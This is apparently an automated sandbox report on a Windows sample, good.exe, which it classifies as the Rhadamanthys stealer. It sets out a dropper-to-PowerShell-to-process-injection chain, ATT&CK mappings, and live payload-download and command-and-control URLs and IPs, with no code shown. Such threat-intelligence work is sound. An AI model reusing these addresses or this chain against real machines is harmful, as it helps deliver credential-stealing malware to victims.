                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731918964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF731918964
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731912C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF731912C54
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RHADAMANTHYS Stealer
                    Source: Yara matchFile source: 0000000C.00000003.2003819326.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2037609353.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2010712842.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected RHADAMANTHYS Stealer
                    Source: Yara matchFile source: 0000000C.00000003.2003819326.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2037609353.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2010712842.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts2
                    Windows Management Instrumentation                    		111
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts12
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Access Token Manipulation                    		1
                    Obfuscated Files or Information                    		LSASS Memory2
                    File and Directory Discovery                    		Remote Desktop Protocol21
                    Input Capture                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Exploitation for Client Execution                    		1
                    Registry Run Keys / Startup Folder                    		211
                    Process Injection                    		1
                    Software Packing                    		Security Account Manager136
                    System Information Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Command and Scripting Interpreter                    		Login Hook1
                    Registry Run Keys / Startup Folder                    		1
                    Timestomp                    		NTDS321
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture13
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts2
                    PowerShell                    		Network Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets1
                    Process Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials31
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Rundll32                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1595244 Sample: good.exe Startdate: 20/01/2025 Architecture: WINDOWS Score: 100 43 s3-w.us-east-1.amazonaws.com 2->43 45 s3-1-w.amazonaws.com 2->45 47 2 other IPs or domains 2->47 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 13 other signatures 2->63 12 good.exe 1 3 2->12         started        15 rundll32.exe 2->15         started        signatures3 process4 file5 41 C:\Users\user\AppData\Local\Temp\...\fwr.vbs, ASCII 12->41 dropped 17 cmd.exe 3 2 12->17         started        process6 process7 19 wscript.exe 1 17->19         started        22 conhost.exe 17->22         started        signatures8 65 Suspicious powershell command line found 19->65 67 Wscript starts Powershell (via cmd or directly) 19->67 69 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->69 71 Suspicious execution chain found 19->71 24 powershell.exe 7 19->24         started        process9 signatures10 79 Suspicious powershell command line found 24->79 81 Suspicious execution chain found 24->81 83 Found suspicious powershell code related to unpacking or dynamic code loading 24->83 27 powershell.exe 14 23 24->27         started        31 conhost.exe 24->31         started        process11 dnsIp12 49 62.60.226.64, 49739, 80 ASLINE-AS-APASLINELIMITEDHK Iran (ISLAMIC Republic Of) 27->49 51 bitbucket.org 185.166.143.48, 443, 49737 AMAZON-02US Germany 27->51 53 s3-w.us-east-1.amazonaws.com 54.231.134.241, 443, 49738 AMAZON-02US United States 27->53 85 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 27->85 87 Writes to foreign memory regions 27->87 89 Injects a PE file into a foreign processes 27->89 91 Loading BitLocker PowerShell Module 27->91 33 RegAsm.exe 1 27->33         started        signatures13 process14 signatures15 55 Switches to a custom stack to bypass stack traces 33->55 36 fontdrvhost.exe 33->36         started        39 WerFault.exe 2 33->39         started        process16 signatures17 73 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 36->73 75 Checks if the current machine is a virtual machine (disk enumeration) 36->75 77 Switches to a custom stack to bypass stack traces 36->77

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    good.exe18%ReversingLabs
                    good.exe23%VirustotalBrowse

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://62.60.226.64/public_files/kmAFAhc.txt0%Avira URL Cloudsafe
                    https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1x0%Avira URL Cloudsafe
                    http://62.60.226.64/public_files/kmAFAhc.txtp0%Avira URL Cloudsafe
                    https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh10%Avira URL Cloudsafe
                    http://62.60.226.640%Avira URL Cloudsafe
                    http://www.microsof..Diah0%Avira URL Cloudsafe
                    http://wwMSFT_PriSmbServerCertificateMapping.cdxml0%Avira URL Cloudsafe
                    http://www.microsof.0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s3-w.us-east-1.amazonaws.com
                    		54.231.134.241
                    		truefalse
                      		high
                      bitbucket.org
                      		185.166.143.48
                      		truefalse
                        		high
                        bbuseruploads.s3.amazonaws.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://62.60.226.64/public_files/kmAFAhc.txttrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1true
                          • Avira URL Cloud: safe
                          		unknown
                          https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://bbuseruploads.s3.amazonaws.compowershell.exe, 0000000A.00000002.1994203864.00000263AA919000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netpowershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1xfontdrvhost.exe, 0000000C.00000002.2036496891.0000000002ADC000.00000004.00000010.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://go.micropowershell.exe, 0000000A.00000002.1994203864.00000263AECDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.microsof..Diahpowershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://62.60.226.64/public_files/kmAFAhc.txtppowershell.exe, 0000000A.00000002.1994203864.00000263AD76A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netpowershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://go.microspowershell.exe, 0000000A.00000002.1994203864.00000263AECDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.micropowershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://wwMSFT_PriSmbServerCertificateMapping.cdxmlpowershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netpowershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://62.60.226.64powershell.exe, 0000000A.00000002.1994203864.00000263AD76A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cdn.cookielaw.org/powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://bbuseruploads.s3.amazonaws.com/a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2-powershell.exe, 0000000A.00000002.1994203864.00000263AA919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://aui-cdn.atlassian.com/powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.microsof.powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://aka.ms/pscore68powershell.exe, 00000006.00000002.2324109491.000001E48006A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2324109491.000001E48004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2324109491.000001E480094000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://bitbucket.orgpowershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          62.60.226.64
                                                                                          		unknownIran (ISLAMIC Republic Of)
                                                                                          		18013ASLINE-AS-APASLINELIMITEDHKtrue
                                                                                          185.166.143.48
                                                                                          		bitbucket.orgGermany
                                                                                          		16509AMAZON-02USfalse
                                                                                          54.231.134.241
                                                                                          		s3-w.us-east-1.amazonaws.comUnited States
                                                                                          		16509AMAZON-02USfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1595244
                                                                                          Start date and time:2025-01-20 15:47:54 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 6m 39s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:17
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:good.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.expl.evad.winEXE@18/8@2/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 25%
                                                                                          HCA Information:Failed
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 3384 because there are no executed function
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7916 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          09:49:09API Interceptor46x Sleep call for process: powershell.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                                          • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          s3-w.us-east-1.amazonaws.comhttps://supreme.1910genetics.com/Get hashmaliciousUnknownBrowse
                                                                                          • 3.5.29.161
                                                                                          https://tlktokshop.biz/Get hashmaliciousUnknownBrowse
                                                                                          • 16.15.193.39
                                                                                          https://tkshap6.vip/Get hashmaliciousUnknownBrowse
                                                                                          • 52.217.143.49
                                                                                          https://store.redeemwalletscode.com/redeemwalletcode/gift/307603441Get hashmaliciousUnknownBrowse
                                                                                          • 52.217.234.161
                                                                                          phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 3.5.28.195
                                                                                          https://files820.sharefile.com/share/view/535143447b874aa4Get hashmaliciousHTMLPhisherBrowse
                                                                                          • 52.217.110.116
                                                                                          phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 52.217.207.73
                                                                                          https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwxzhlqqgub8rchwk_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a5/0ibbcmvfccobt1ru40aael864dimea/ruixian.wang@huawei.comGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 3.5.31.16
                                                                                          https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwgpxp66dumoglzvq_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a6/yqfroqxuuz8idjj1hn2brw3g7czoqi/marian@ferax.com.plGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 52.216.43.161
                                                                                          https://yjdjraabb.cc.rs6.net/tn.jsp?f=001cD7EmEKntgjghgQWpq9s2lW_mstWA0PSxRR7i3h0LbK5HgiPx3gu3HduoBs_Rnxmx0i7FlZL9378mrMLd5LlF6GT3bXi2U8GDrXfdsc2qPaLW94j0wm6KbaRHgZvZZRsEDv_wILG0rjmaLTfE5xpKJl15r5SI1xPSSiQsd9YUqKeemOHvTBSlSwV6tHZZ755Z52-jrPWl0FY7ZZ-PKGQ_IxPzhJqeaH15y4Vkailf2jrOpi4MibpjQ==&c=wK30YrUWFPbHl2B1oEErLYSqPkydS65M2el3xt7vMb11ny4WQ0yJgQ==&ch=8IgRaXvzzpu7qgxKTkXdqoYWo2ml_yYytv3GcZQiibggV2wrl_cJAA==Get hashmaliciousUnknownBrowse
                                                                                          • 3.5.10.158
                                                                                          bitbucket.orgphish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 185.166.143.48
                                                                                          phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 185.166.143.50
                                                                                          https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwxzhlqqgub8rchwk_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a5/0ibbcmvfccobt1ru40aael864dimea/ruixian.wang@huawei.comGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 185.166.143.48
                                                                                          https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwgpxp66dumoglzvq_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a6/yqfroqxuuz8idjj1hn2brw3g7czoqi/marian@ferax.com.plGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 185.166.143.50
                                                                                          https://nuance-pdf-professional2.software.informer.com/7.2/Get hashmaliciousUnknownBrowse
                                                                                          • 185.166.143.50
                                                                                          atomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                          • 185.166.143.48
                                                                                          invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                          • 185.166.143.49
                                                                                          invoice-1623385214 pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                          • 185.166.143.50
                                                                                          0a0#U00a0.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                          • 185.166.143.50
                                                                                          https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63a%2F3274607708%2FSmartadvocate%2F%23%3Fnl=ZGF5aGFuYXJhQHNtYXJ0YWR2b2NhdGUuY29t/1/010901943144e678-be97f397-fbf4-4935-81cc-f9ffe0e007ba-000000/Ra9zEF9F5Gh7LdH-GSmxaBW3ylU=188Get hashmaliciousScreenConnect ToolBrowse
                                                                                          • 185.166.143.49

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          AMAZON-02USDoc.exeGet hashmaliciousFormBookBrowse
                                                                                          • 13.248.169.48
                                                                                          PO#3210046374.exeGet hashmaliciousFormBookBrowse
                                                                                          • 13.248.169.48
                                                                                          Purchase Order sheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 54.252.88.45
                                                                                          0000003323677.jsGet hashmaliciousRevengeRATBrowse
                                                                                          • 13.49.66.229
                                                                                          Purchase Order sheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 54.252.88.45
                                                                                          Payment Advice.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 18.197.190.144
                                                                                          Purchase Order sheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 18.184.20.38
                                                                                          Payment Advice.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 18.184.20.38
                                                                                          Solicita#U00e7#U00e3o n#U00ba 9822342.jsGet hashmaliciousRevengeRATBrowse
                                                                                          • 13.49.66.229
                                                                                          Purchase Order sheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 18.197.190.144
                                                                                          ASLINE-AS-APASLINELIMITEDHKZRc64MQ0nl.exeGet hashmaliciousNitolBrowse
                                                                                          • 107.148.149.107
                                                                                          zmpZMfK1b4.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                          • 62.60.226.62
